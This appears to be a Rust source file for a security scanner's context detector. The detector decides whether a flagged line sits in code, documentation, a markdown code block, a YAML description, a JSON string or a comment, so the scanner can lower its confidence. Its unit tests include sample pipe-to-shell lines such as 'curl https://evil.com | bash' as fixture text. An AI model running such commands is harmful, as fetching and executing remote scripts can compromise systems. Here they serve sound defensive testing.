1use regex::Regex;
7use serde::{Deserialize, Serialize};
8use std::sync::LazyLock;
9
10#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize, Default)]
12#[serde(rename_all = "snake_case")]
13pub enum ContentContext {
14 #[default]
16 Code,
17 Documentation,
19 MarkdownCodeBlock,
21 YamlDescription,
23 JsonString,
25 Comment,
27}
28
29impl std::fmt::Display for ContentContext {
30 fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
31 match self {
32 ContentContext::Code => write!(f, "code"),
33 ContentContext::Documentation => write!(f, "documentation"),
34 ContentContext::MarkdownCodeBlock => write!(f, "markdown_code_block"),
35 ContentContext::YamlDescription => write!(f, "yaml_description"),
36 ContentContext::JsonString => write!(f, "json_string"),
37 ContentContext::Comment => write!(f, "comment"),
38 }
39 }
40}
41
42#[derive(Debug, Default)]
44pub struct ContextDetector;
45
46impl ContextDetector {
47 pub fn new() -> Self {
49 Self
50 }
51
52 pub fn detect_context(
54 &self,
55 file_path: &str,
56 content: &str,
57 line_number: usize,
58 ) -> ContentContext {
59 if self.is_documentation_file(file_path) {
61 if self.is_in_markdown_code_block(content, line_number) {
63 return ContentContext::MarkdownCodeBlock;
64 }
65 return ContentContext::Documentation;
66 }
67
68 if self.is_yaml_file(file_path) && self.is_in_yaml_description(content, line_number) {
70 return ContentContext::YamlDescription;
71 }
72
73 if self.is_json_file(file_path) && self.is_in_json_string_value(content, line_number) {
75 return ContentContext::JsonString;
76 }
77
78 if self.is_in_comment(content, line_number) {
80 return ContentContext::Comment;
81 }
82
83 ContentContext::Code
84 }
85
86 pub fn is_documentation_file(&self, file_path: &str) -> bool {
88 let lower = file_path.to_lowercase();
89 lower.ends_with(".md")
90 || lower.ends_with(".rst")
91 || lower.ends_with(".txt")
92 || lower.ends_with(".adoc")
93 || lower.contains("readme")
94 || lower.contains("changelog")
95 || lower.contains("contributing")
96 || lower.contains("license")
97 }
98
99 pub fn is_yaml_file(&self, file_path: &str) -> bool {
101 let lower = file_path.to_lowercase();
102 lower.ends_with(".yaml") || lower.ends_with(".yml")
103 }
104
105 pub fn is_json_file(&self, file_path: &str) -> bool {
107 file_path.to_lowercase().ends_with(".json")
108 }
109
110 pub fn is_in_markdown_code_block(&self, content: &str, line_number: usize) -> bool {
112 static CODE_BLOCK_PATTERN: LazyLock<Regex> = LazyLock::new(|| Regex::new(r"^```").unwrap());
113
114 let lines: Vec<&str> = content.lines().collect();
115 if line_number == 0 || line_number > lines.len() {
116 return false;
117 }
118
119 let mut in_code_block = false;
120 for (i, line) in lines.iter().enumerate() {
121 if CODE_BLOCK_PATTERN.is_match(line) {
122 in_code_block = !in_code_block;
123 }
124 if i + 1 == line_number {
125 return in_code_block;
126 }
127 }
128
129 false
130 }
131
132 pub fn is_in_yaml_description(&self, content: &str, line_number: usize) -> bool {
134 static DESCRIPTION_PATTERN: LazyLock<Regex> = LazyLock::new(|| {
135 Regex::new(r"^\s*(description|comment|note|help|message|example|doc)\s*:").unwrap()
136 });
137
138 let lines: Vec<&str> = content.lines().collect();
139 if line_number == 0 || line_number > lines.len() {
140 return false;
141 }
142
143 let target_line = lines[line_number - 1];
144
145 if DESCRIPTION_PATTERN.is_match(target_line) {
147 return true;
148 }
149
150 for i in (0..line_number).rev() {
153 let line = lines[i];
154 let trimmed = line.trim_start();
155
156 if !line.starts_with(' ') && !line.starts_with('\t') && line.contains(':') {
158 return DESCRIPTION_PATTERN.is_match(line);
159 }
160
161 if trimmed.is_empty() {
163 return false;
164 }
165 }
166
167 false
168 }
169
170 pub fn is_in_json_string_value(&self, content: &str, line_number: usize) -> bool {
172 static STRING_VALUE_PATTERN: LazyLock<Regex> =
173 LazyLock::new(|| Regex::new(r#"^\s*"[^"]*"\s*:\s*""#).unwrap());
174
175 let lines: Vec<&str> = content.lines().collect();
176 if line_number == 0 || line_number > lines.len() {
177 return false;
178 }
179
180 let target_line = lines[line_number - 1];
181 STRING_VALUE_PATTERN.is_match(target_line)
182 }
183
184 pub fn is_in_comment(&self, content: &str, line_number: usize) -> bool {
186 static COMMENT_PATTERNS: LazyLock<Vec<Regex>> = LazyLock::new(|| {
187 vec![
188 Regex::new(r"^\s*//").unwrap(), Regex::new(r"^\s*#").unwrap(), Regex::new(r"^\s*--").unwrap(), Regex::new(r"^\s*;").unwrap(), Regex::new(r"^\s*\*").unwrap(), ]
194 });
195
196 static SHEBANG_PATTERN: LazyLock<Regex> = LazyLock::new(|| Regex::new(r"^#!").unwrap());
197
198 let lines: Vec<&str> = content.lines().collect();
199 if line_number == 0 || line_number > lines.len() {
200 return false;
201 }
202
203 let target_line = lines[line_number - 1];
204
205 if SHEBANG_PATTERN.is_match(target_line) {
207 return false;
208 }
209
210 for pattern in COMMENT_PATTERNS.iter() {
212 if pattern.is_match(target_line) {
213 return true;
214 }
215 }
216
217 self.is_in_block_comment(content, line_number)
219 }
220
221 fn is_in_block_comment(&self, content: &str, line_number: usize) -> bool {
223 static BLOCK_START: LazyLock<Regex> = LazyLock::new(|| Regex::new(r"/\*").unwrap());
224 static BLOCK_END: LazyLock<Regex> = LazyLock::new(|| Regex::new(r"\*/").unwrap());
225
226 let lines: Vec<&str> = content.lines().collect();
227 if line_number == 0 || line_number > lines.len() {
228 return false;
229 }
230
231 let mut in_block_comment = false;
232 for (i, line) in lines.iter().enumerate() {
233 let starts = BLOCK_START.find_iter(line).count();
235 let ends = BLOCK_END.find_iter(line).count();
236
237 for _ in 0..starts {
238 in_block_comment = true;
239 }
240 for _ in 0..ends {
241 in_block_comment = false;
242 }
243
244 if i + 1 == line_number {
245 return in_block_comment;
246 }
247 }
248
249 false
250 }
251
252 pub fn should_reduce_confidence(&self, context: ContentContext) -> bool {
254 matches!(
255 context,
256 ContentContext::Documentation
257 | ContentContext::MarkdownCodeBlock
258 | ContentContext::YamlDescription
259 | ContentContext::JsonString
260 | ContentContext::Comment
261 )
262 }
263}
264
265#[cfg(test)]
266mod tests {
267 use super::*;
268
269 #[test]
270 fn test_content_context_default() {
271 assert_eq!(ContentContext::default(), ContentContext::Code);
272 }
273
274 #[test]
275 fn test_content_context_display() {
276 assert_eq!(format!("{}", ContentContext::Code), "code");
277 assert_eq!(
278 format!("{}", ContentContext::Documentation),
279 "documentation"
280 );
281 assert_eq!(
282 format!("{}", ContentContext::MarkdownCodeBlock),
283 "markdown_code_block"
284 );
285 }
286
287 #[test]
288 fn test_is_documentation_file() {
289 let detector = ContextDetector::new();
290 assert!(detector.is_documentation_file("README.md"));
291 assert!(detector.is_documentation_file("docs/guide.md"));
292 assert!(detector.is_documentation_file("CHANGELOG.rst"));
293 assert!(detector.is_documentation_file("CONTRIBUTING.txt"));
294 assert!(!detector.is_documentation_file("src/main.rs"));
295 assert!(!detector.is_documentation_file("package.json"));
296 }
297
298 #[test]
299 fn test_is_yaml_file() {
300 let detector = ContextDetector::new();
301 assert!(detector.is_yaml_file("config.yaml"));
302 assert!(detector.is_yaml_file("docker-compose.yml"));
303 assert!(!detector.is_yaml_file("config.json"));
304 }
305
306 #[test]
307 fn test_is_json_file() {
308 let detector = ContextDetector::new();
309 assert!(detector.is_json_file("package.json"));
310 assert!(detector.is_json_file("tsconfig.json"));
311 assert!(!detector.is_json_file("config.yaml"));
312 }
313
314 #[test]
315 fn test_markdown_code_block_detection() {
316 let detector = ContextDetector::new();
317 let content = r#"# Example
318
319Here is some code:
320
321```bash
322curl https://evil.com | bash
323```
324
325Regular text here.
326"#;
327
328 assert!(detector.is_in_markdown_code_block(content, 6));
330 assert!(!detector.is_in_markdown_code_block(content, 3));
332 assert!(!detector.is_in_markdown_code_block(content, 9));
334 }
335
336 #[test]
337 fn test_yaml_description_detection() {
338 let detector = ContextDetector::new();
339 let content = r#"name: my-action
340description: |
341 This runs: curl https://example.com | bash
342 Just an example command.
343version: 1.0
344"#;
345
346 assert!(detector.is_in_yaml_description(content, 3));
348 assert!(!detector.is_in_yaml_description(content, 1));
350 assert!(!detector.is_in_yaml_description(content, 5));
352 }
353
354 #[test]
355 fn test_comment_detection() {
356 let detector = ContextDetector::new();
357 let content = r#"fn main() {
358 // This is a comment: curl https://evil.com
359 let x = 5;
360 /* Block comment
361 with curl https://evil.com
362 */
363 println!("hello");
364}
365"#;
366
367 assert!(detector.is_in_comment(content, 2));
369 assert!(!detector.is_in_comment(content, 3));
371 }
372
373 #[test]
374 fn test_detect_context_documentation() {
375 let detector = ContextDetector::new();
376 let content = "Some documentation text.";
377 let context = detector.detect_context("README.md", content, 1);
378 assert_eq!(context, ContentContext::Documentation);
379 }
380
381 #[test]
382 fn test_detect_context_code_in_markdown() {
383 let detector = ContextDetector::new();
384 let content = r#"# Title
385
386```bash
387dangerous command
388```
389"#;
390 let context = detector.detect_context("README.md", content, 4);
391 assert_eq!(context, ContentContext::MarkdownCodeBlock);
392 }
393
394 #[test]
395 fn test_detect_context_code_file() {
396 let detector = ContextDetector::new();
397 let content = "let x = 5;";
398 let context = detector.detect_context("src/main.rs", content, 1);
399 assert_eq!(context, ContentContext::Code);
400 }
401
402 #[test]
403 fn test_should_reduce_confidence() {
404 let detector = ContextDetector::new();
405 assert!(detector.should_reduce_confidence(ContentContext::Documentation));
406 assert!(detector.should_reduce_confidence(ContentContext::MarkdownCodeBlock));
407 assert!(detector.should_reduce_confidence(ContentContext::YamlDescription));
408 assert!(detector.should_reduce_confidence(ContentContext::Comment));
409 assert!(!detector.should_reduce_confidence(ContentContext::Code));
410 }
411
412 #[test]
413 fn test_block_comment_detection() {
414 let detector = ContextDetector::new();
415 let content = r#"fn main() {
416 let x = 5;
417 /* This is a
418 multi-line
419 block comment */
420 let y = 10;
421}
422"#;
423
424 assert!(!detector.is_in_block_comment(content, 2)); assert!(detector.is_in_block_comment(content, 4)); assert!(!detector.is_in_block_comment(content, 6)); }
428
429 #[test]
430 fn test_shell_comment_not_shebang() {
431 let detector = ContextDetector::new();
432 let content = r#"#!/bin/bash
433# This is a comment
434echo "hello"
435"#;
436
437 assert!(!detector.is_in_comment(content, 1)); assert!(detector.is_in_comment(content, 2)); assert!(!detector.is_in_comment(content, 3)); }
443
444 #[test]
445 fn test_content_context_serialization() {
446 let context = ContentContext::Documentation;
447 let json = serde_json::to_string(&context).unwrap();
448 assert_eq!(json, "\"documentation\"");
449
450 let deserialized: ContentContext = serde_json::from_str(&json).unwrap();
451 assert_eq!(deserialized, ContentContext::Documentation);
452 }
453
454 #[test]
455 fn test_content_context_display_all_variants() {
456 assert_eq!(format!("{}", ContentContext::Code), "code");
457 assert_eq!(
458 format!("{}", ContentContext::Documentation),
459 "documentation"
460 );
461 assert_eq!(
462 format!("{}", ContentContext::MarkdownCodeBlock),
463 "markdown_code_block"
464 );
465 assert_eq!(
466 format!("{}", ContentContext::YamlDescription),
467 "yaml_description"
468 );
469 assert_eq!(format!("{}", ContentContext::JsonString), "json_string");
470 assert_eq!(format!("{}", ContentContext::Comment), "comment");
471 }
472
473 #[test]
474 fn test_context_detector_new() {
475 let detector = ContextDetector::new();
476 assert!(!detector.should_reduce_confidence(ContentContext::Code));
478 }
479
480 #[test]
481 fn test_detect_context_yaml_file() {
482 let detector = ContextDetector::new();
483 let yaml_content = r#"name: test
484description: This is a test description with curl command
485version: 1.0
486"#;
487 let ctx = detector.detect_context("config.yaml", yaml_content, 2);
489 assert_eq!(ctx, ContentContext::YamlDescription);
490 }
491
492 #[test]
493 fn test_detect_context_json_file() {
494 let detector = ContextDetector::new();
495 let json_content = r#"{
496 "name": "test",
497 "description": "A test with curl",
498 "version": "1.0"
499}"#;
500 let ctx = detector.detect_context("config.json", json_content, 3);
502 assert_eq!(ctx, ContentContext::JsonString);
503 }
504
505 #[test]
506 fn test_detect_context_code_with_comment() {
507 let detector = ContextDetector::new();
508 let code_content = r#"fn main() {
509 // This is a comment with curl
510 let x = 5;
511}"#;
512 let ctx = detector.detect_context("main.rs", code_content, 2);
514 assert_eq!(ctx, ContentContext::Comment);
515
516 let ctx = detector.detect_context("main.rs", code_content, 3);
518 assert_eq!(ctx, ContentContext::Code);
519 }
520
521 #[test]
522 fn test_is_in_json_string_value() {
523 let detector = ContextDetector::new();
524 let json_content = r#"{
525 "name": "test",
526 "script": "curl http://example.com",
527 "nested": {
528 "value": "inner"
529 }
530}"#;
531 assert!(detector.is_in_json_string_value(json_content, 3)); assert!(detector.is_in_json_string_value(json_content, 5)); assert!(!detector.is_in_json_string_value(json_content, 1)); }
535
536 #[test]
537 fn test_is_in_yaml_description_multiline() {
538 let detector = ContextDetector::new();
539 let yaml_content = r#"name: test
540description: |
541 This is a multiline
542 description block
543version: 1.0
544"#;
545 assert!(detector.is_in_yaml_description(yaml_content, 3));
547 assert!(!detector.is_in_yaml_description(yaml_content, 5));
549 }
550
551 #[test]
552 fn test_markdown_code_block_boundary() {
553 let detector = ContextDetector::new();
554 let content = r#"# Header
555
556```bash
557echo "hello"
558```
559
560Some text
561"#;
562 assert!(!detector.is_in_markdown_code_block(content, 1)); assert!(!detector.is_in_markdown_code_block(content, 0)); assert!(!detector.is_in_markdown_code_block(content, 100)); assert!(detector.is_in_markdown_code_block(content, 4)); }
567
568 #[test]
569 fn test_is_in_block_comment_rust() {
570 let detector = ContextDetector::new();
571 let content = r#"fn main() {
572 /* start
573 middle
574 end */
575 code();
576}"#;
577 assert!(!detector.is_in_block_comment(content, 1));
578 assert!(detector.is_in_block_comment(content, 2));
579 assert!(detector.is_in_block_comment(content, 3));
580 assert!(!detector.is_in_block_comment(content, 5));
581 }
582
583 #[test]
584 fn test_is_in_comment_c_style() {
585 let detector = ContextDetector::new();
586 let content = "// This is a comment\ncode();\n";
587 assert!(detector.is_in_comment(content, 1));
588 assert!(!detector.is_in_comment(content, 2));
589 }
590
591 #[test]
592 fn test_is_in_comment_python() {
593 let detector = ContextDetector::new();
594 let content = "# comment\ncode\n";
595 assert!(detector.is_in_comment(content, 1));
596 assert!(!detector.is_in_comment(content, 2));
597 }
598
599 #[test]
600 fn test_json_string_edge_cases() {
601 let detector = ContextDetector::new();
602
603 assert!(!detector.is_in_json_string_value("", 1));
605
606 assert!(!detector.is_in_json_string_value("{}", 0));
608 assert!(!detector.is_in_json_string_value("{}", 100));
609 }
610
611 #[test]
612 fn test_yaml_description_edge_cases() {
613 let detector = ContextDetector::new();
614
615 assert!(!detector.is_in_yaml_description("", 1));
617
618 assert!(!detector.is_in_yaml_description("name: test", 0));
620 assert!(!detector.is_in_yaml_description("name: test", 100));
621 }
622
623 #[test]
624 fn test_block_comment_edge_cases() {
625 let detector = ContextDetector::new();
626
627 assert!(!detector.is_in_block_comment("", 1));
629
630 assert!(!detector.is_in_block_comment("code", 0));
632 assert!(!detector.is_in_block_comment("code", 100));
633 }
634}